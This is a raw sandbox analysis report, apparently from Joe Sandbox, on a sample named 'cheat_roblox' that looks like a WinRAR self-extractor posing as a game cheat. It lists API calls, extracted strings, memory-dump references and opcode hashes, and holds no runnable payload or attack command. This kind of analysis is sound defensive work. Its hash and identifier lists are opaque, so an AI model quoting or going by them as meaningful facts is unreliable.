                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E640BC: FindFirstFileW.KERNELBASE ref: 00007FF693E6410B
                                                                                • Part of subcall function 00007FF693E640BC: FindFirstFileW.KERNEL32 ref: 00007FF693E6415E
                                                                                • Part of subcall function 00007FF693E640BC: GetLastError.KERNEL32 ref: 00007FF693E641AF
                                                                              • FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1464966427-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                              • Instruction ID: b8cd494078451710cd05926e125fbc2df4797c898b64a9027ead6f3364704da9
                                                                              • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                              • Instruction Fuzzy Hash: AFF08C10F0920B56FF746BB258133B61298DF887A0F0816B2DD6EE63C1DEACA4828210
                                                                              APIs
                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF693E6207E), ref: 00007FF693E620F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindNotification
                                                                              • String ID:
                                                                              • API String ID: 2591292051-0
                                                                              • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                              • Instruction ID: a127095aac8a9f75ad5896273f330be4e9dcb44f7cbbbbbf80ffd79290442416
                                                                              • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                              • Instruction Fuzzy Hash: F0F0A922A0968685FF348F20E04237936A9EB14BBCF4943B6EB3C891D4DF28D8958300
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: File
                                                                              • String ID:
                                                                              • API String ID: 749574446-0
                                                                              • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                              • Instruction ID: 2f703308f1f90a804214fd02c59315fee84819425106fa981ccd9e4fcd4d7c36
                                                                              • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                                                                              • Instruction Fuzzy Hash: 37E08611A1051581EF309B26C8436342325EF48B84B441072CE0C97371CE29D8958700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileType
                                                                              • String ID:
                                                                              • API String ID: 3081899298-0
                                                                              • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                              • Instruction ID: 4b6909371fa4c8a7293372579a836bc52858ca9de3c6bc303bbf4abf94200a7a
                                                                              • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                              • Instruction Fuzzy Hash: 32D01212D0945183ED2097369C5303C3354EF92739FA407B2D73EE16E1CF1D9496A311
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                              • Instruction ID: 4f0e2c99d8af1311f4c7346abd9a49c373cc1012d9e705cc78f6c3d5b63a2f13
                                                                              • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                              • Instruction Fuzzy Hash: 26C08C20F05602C1EA189B26C8CB11923ACFB40B08B614076C20CE1130CE2DC8EA9349
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                              • API String ID: 2659423929-3508440684
                                                                              • Opcode ID: 58b1de9f04650da3a7d44ba51163ba8a1ddb0a7ff3a84d81a8b9d40fd4fd1432
                                                                              • Instruction ID: 48d8f389e9ff71dab9f1449f730103ff909b7dfd7a315a5869819d4ae718ef17
                                                                              • Opcode Fuzzy Hash: 58b1de9f04650da3a7d44ba51163ba8a1ddb0a7ff3a84d81a8b9d40fd4fd1432
                                                                              • Instruction Fuzzy Hash: AF62E066F0864285FF20DB74D4562BD2369EB857A8F104273DA2DE7AE6DF38E585C300
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                              • String ID: %ls$%s: %s
                                                                              • API String ID: 2539828978-2259941744
                                                                              • Opcode ID: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                              • Instruction ID: afef1481c36e06436d69b0ee100b41c11cb833ec73c2b8adcec13454c9bc0ba8
                                                                              • Opcode Fuzzy Hash: 6623834c6ca9731efd334e76f2f7c4d48775863e17bd3527b859c843ee7b3cd4
                                                                              • Instruction Fuzzy Hash: 6CB29A62E1868281EE309B25D4562BE6369FFD57D4F104277E79EA37EAEE2CD540C300
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfomemcpy_s
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 1759834784-2761157908
                                                                              • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                              • Instruction ID: 306c8a1e9b45cd18d8e843449408dd3262bca4f2dcd1c2cbaf9d08aebaab9127
                                                                              • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                                                                              • Instruction Fuzzy Hash: EEB2E972E081868BEB7ACE69D4417FD37A9FB44788F505176DA0AB7B84DF38E5048B40
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                              • String ID: rtmp
                                                                              • API String ID: 3587137053-870060881
                                                                              • Opcode ID: 95fd495c96588198a5e03d902ada1db168ea9de9ecec27f1500150cb6c79cd49
                                                                              • Instruction ID: e595a40c700b60ee1d1256e67acbb53d424f934171d09c2883e18e0db337c252
                                                                              • Opcode Fuzzy Hash: 95fd495c96588198a5e03d902ada1db168ea9de9ecec27f1500150cb6c79cd49
                                                                              • Instruction Fuzzy Hash: 4AF1C222B08A8285EF20CB65D4821BD7769EB857C8F501573EB4DE7AAADF3CD584C740
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1693479884-0
                                                                              • Opcode ID: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                              • Instruction ID: dfcadd7d73e450a1ee3225c60cfd632a0588ee7ac7f860401d4cae60241390f1
                                                                              • Opcode Fuzzy Hash: 13b57053c9edb0f691e6564e78418f78cd1dc0b326f339559e8595bdf58b92da
                                                                              • Instruction Fuzzy Hash: B9A1A162F15A5284FE20CB79884A1BD3365EB85BA8B145276DF2DA7BD9DE3CE0418304
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 3140674995-0
                                                                              • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                              • Instruction ID: 5b538e1a42c487562119573600a8071d1029f40ae1c2aff05e66ee1c939b64cb
                                                                              • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                                                                              • Instruction Fuzzy Hash: 86315076A08B819AEB70CF60E8513ED7368FB88744F44447ADA4D97B99EF38D548C710
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 1239891234-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              APIs
                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF693E8FAC4
                                                                                • Part of subcall function 00007FF693E87934: GetCurrentProcess.KERNEL32(00007FF693E90CCD), ref: 00007FF693E87961
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                              • String ID: *?$.
                                                                              • API String ID: 2518042432-3972193922
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1502251526-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                              • String ID:
                                                                              • API String ID: 1365068426-0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .
                                                                              • API String ID: 0-248832578
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise_clrfp
                                                                              • String ID:
                                                                              • API String ID: 15204871-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectRelease$CapsDevice
                                                                              • String ID:
                                                                              • API String ID: 1061551593-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FormatInfoLocaleNumber
                                                                              • String ID:
                                                                              • API String ID: 2169056816-0
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E624C0: CreateFileW.KERNELBASE ref: 00007FF693E6259B
                                                                                • Part of subcall function 00007FF693E624C0: GetLastError.KERNEL32 ref: 00007FF693E625AE
                                                                                • Part of subcall function 00007FF693E624C0: CreateFileW.KERNEL32 ref: 00007FF693E6260E
                                                                                • Part of subcall function 00007FF693E624C0: GetLastError.KERNEL32 ref: 00007FF693E62617
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E615D0
                                                                                • Part of subcall function 00007FF693E63980: MoveFileW.KERNEL32 ref: 00007FF693E639BD
                                                                                • Part of subcall function 00007FF693E63980: MoveFileW.KERNEL32 ref: 00007FF693E63A34
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 34527147-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                              • Instruction ID: a6a906193636d02b9e48971516571769304aef8fb3f5fa7f6418bb100ceb3a3b
                                                                              • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                              • Instruction Fuzzy Hash: 7A01D775A086468AF6748B11E89677A32A9FBD8314F5002B6D65EA6794DF3CF8058A00
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: 0
                                                                              • API String ID: 3215553584-4108050209
                                                                              • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                              • Instruction ID: 5dcdb1bb7938c488ad8445de0c8009ca71d27c347d9d3e37107dc3fd59a4f661
                                                                              • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                              • Instruction Fuzzy Hash: 9D81F422E1824B86EAB88A15854267D23DDEF60748F1419B3DD09FB6D9CF3DEC46C342
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: 0
                                                                              • API String ID: 3215553584-4108050209
                                                                              • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                              • Instruction ID: d081fdbc178ea9eaf3125b1bfe2ad5d98fd9b10d8eeae55d306c92aaff348fd1
                                                                              • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                              • Instruction Fuzzy Hash: 5871E525E0C28B46FBB88A2980422BD2399DF81B44F1459F7DD49F76D6CE2DEC46C741
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gj
                                                                              • API String ID: 0-4203073231
                                                                              • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                              • Instruction ID: 6096b15b7f7ede01e5902ab6aa89470645baaa30c04a30f6690ef254795a9dee
                                                                              • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                              • Instruction Fuzzy Hash: C5519037B286908BD764CF25E401A9A73A5F388758F445126EF4A93B09CB3DE945CF40
                                                                              Strings
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                              • Instruction ID: c93351855689a1b00c061cf819ebb81b0e2266f4a668771dd854b7b575118b06
                                                                              • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                              • Instruction Fuzzy Hash: 0341BD36B14A4986EA18CF2AE4162A9B7A9E758FD0B499037DE0DE7754DE3CD482C300
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                              • Instruction ID: e426182b081d1c0455bafb4db3ae9b81a7a3dd2e0c8fadfd38421c879a99f350
                                                                              • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                              • Instruction Fuzzy Hash: 8FB09220E17B06C2EA196F126C8326822E9FF58B00F9480BAD50CE1320DE2C24A54700
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                              • Instruction ID: cb0e3e8fadc2224f3489e4f20b25320e73ead8b0d667b2399c81120c6d999707
                                                                              • Opcode Fuzzy Hash: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                              • Instruction Fuzzy Hash: 9D8234A3A096C186D765CF28D4066FC3BA5E751B88F09817BCA4F97386EE3CD945C710
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                              • Instruction ID: 989aebe207377dbf0340c5e14a0bbdaeb82adbbe08d9fbfb7234cb486c0eac90
                                                                              • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                              • Instruction Fuzzy Hash: 3E628E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                              • Instruction ID: 70c5ff149ff046b536230d0b70ff441a844115a0deb5b6863e0833f53cfd5287
                                                                              • Opcode Fuzzy Hash: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                              • Instruction Fuzzy Hash: B98211B3A096C18ADB24CF28D4456FC7BA5F755B48F088176CA4EA778ADE3CD885C710
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                              • Instruction ID: b1df464099a577e1030061379e83eca300aa440bef54828681c5ba4dca276412
                                                                              • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                              • Instruction Fuzzy Hash: 0422E5B3B246508BD728CF15C89AE5E376AF798744B4B8229DF0ACB785DB38D505CB40
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                              • Instruction ID: 6c51db8e1ec9ee3c7400c68015f8740e568caabf3c1474bcc54f3d08ec893d6d
                                                                              • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                              • Instruction Fuzzy Hash: D132DF72A086918BE72CCF24D551ABD37A5F754B08F05813ADB4BA7B89DF3CA851CB40
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                              • Instruction ID: c3a945c4a67924adc6b07db22da076ce91764903ad8a9f44020a18b11dc0cf1f
                                                                              • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                              • Instruction Fuzzy Hash: 50C19DB7B281908FE360CF7AE400A9D3BB1F39878CB519125DF59A7B09D639E645CB40
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                              • API String ID: 3668304517-727060406
                                                                              Similarity
                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                              • API String ID: 2565136772-3242537097
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                              • String ID: DXGIDebug.dll$UNC$\\?\
                                                                              • API String ID: 4097890229-4048004291
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                              • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                              • API String ID: 431506467-1315819833
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                              • API String ID: 3215553584-2617248754
                                                                              Similarity
                                                                              • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                              • String ID: STATIC
                                                                              • API String ID: 781704138-1882779555
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                              • API String ID: 2721297748-1533471033
                                                                              Similarity
                                                                              • API ID: Item$Text
                                                                              • String ID: LICENSEDLG
                                                                              • API String ID: 1601838975-2177901306
                                                                              Similarity
                                                                              • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                              • API String ID: 2915667086-2207617598
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: $
                                                                              • API String ID: 3668304517-227171996
                                                                              Similarity
                                                                              • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 2940173790-393685449
                                                                              Similarity
                                                                              • API ID: AllocClearStringVariant
                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                              • API String ID: 1959693985-3505469590
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E87371
                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E8737F
                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873A9
                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873EF
                                                                              • GetProcAddress.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873FB
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                              • String ID: api-ms-
                                                                              • API String ID: 2559590344-2084034818
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E8162B
                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E81648
                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF693E81573,?,?,?,00007FF693E8192A), ref: 00007FF693E81664
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                              • API String ID: 667068680-1718035505
                                                                              • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
